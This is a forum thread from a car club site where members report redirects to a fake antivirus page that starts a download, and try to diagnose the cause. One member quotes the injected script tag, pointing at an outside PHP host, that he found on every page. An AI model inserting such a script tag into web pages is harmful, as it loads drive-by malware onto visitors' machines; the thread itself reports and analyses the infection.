Board problem

[Typhoon90]

Last two days when I've opened random topics, I have been redirected to a site that is trying to look like a malware search. The giveaway is it is still open in Safari but designed to look like the windows XP menu system. I don't know if the site is malicious or not, but it does ask to "search" for problems, but it initialises a download.
I couldn't find a link on the site to report it to the relevant people.

Regards, Andrew.

[Sheldon McIntosh]

It is a malicious site, I would suggest closing it straightaway if it happens again.

It shouldn't happen again, the previous moderator of this forum spent two hours trying to fix it last night, even though he is on an overseas holiday.

I'll buy him a beer when he gets back to thank him for his efforts.

[Darryl]

It is a malicious site, I would suggest closing it straightaway if it happens again.

It shouldn't happen again, the previous moderator of this forum spent two hours trying to fix it last night, even though he is on an overseas holiday.

I'll buy him a beer when he gets back to thank him for his efforts.

Well - it hasn't worked. Or if it did the attacker managed to re-inject the script - or maybe, given my ISP likes to use a #$@#$@ "transparent" proxy its actually the proxy coming back with something stale...

Anyway, for the admin (if there is one - sounds like a bad situation for the "ex" and a sorry state of affairs for the club - before I saw your post I was going to suggest that the webmaster link was sadly absent - but looks like the webmaster is absent too):

The "root" of the evil still seems to be a script link at the bottom of each page:

<script src="http://meqashopperonline.com/mm.php"></script>

which gets a script from/on a server in russia... which then grabs stuff from another server with the actual evil content on it...

hth....

[Sheldon McIntosh]

Hmm, I haven't seen it for a couple of days.

[Darryl]

Hmm, I haven't seen it for a couple of days.

There is some sort of saved state - I've had to clear my browser history to see it again.

I can't 100% confirm (from here at least) that its not a proxy cache that is giving me the badness... Although based on headers it doesn't look like cached/stale.

[ALFA156DALE]

This has happened to me a few times too, it just happened before when i logged on here and went to the home page of AROCA, i thought it just might have been my computer.

[philpot]

 

Yep, still there...

There's a thread in the victorian section re this problem....

Got on this time but last try 15minutes ago antivirus software blocked site as unsafe due to 17 'Fake Antivirus Webpage Requests'

'Drive-by Downloads' is the term....

See 'Malware on the Forum' in Victorian Section for more info....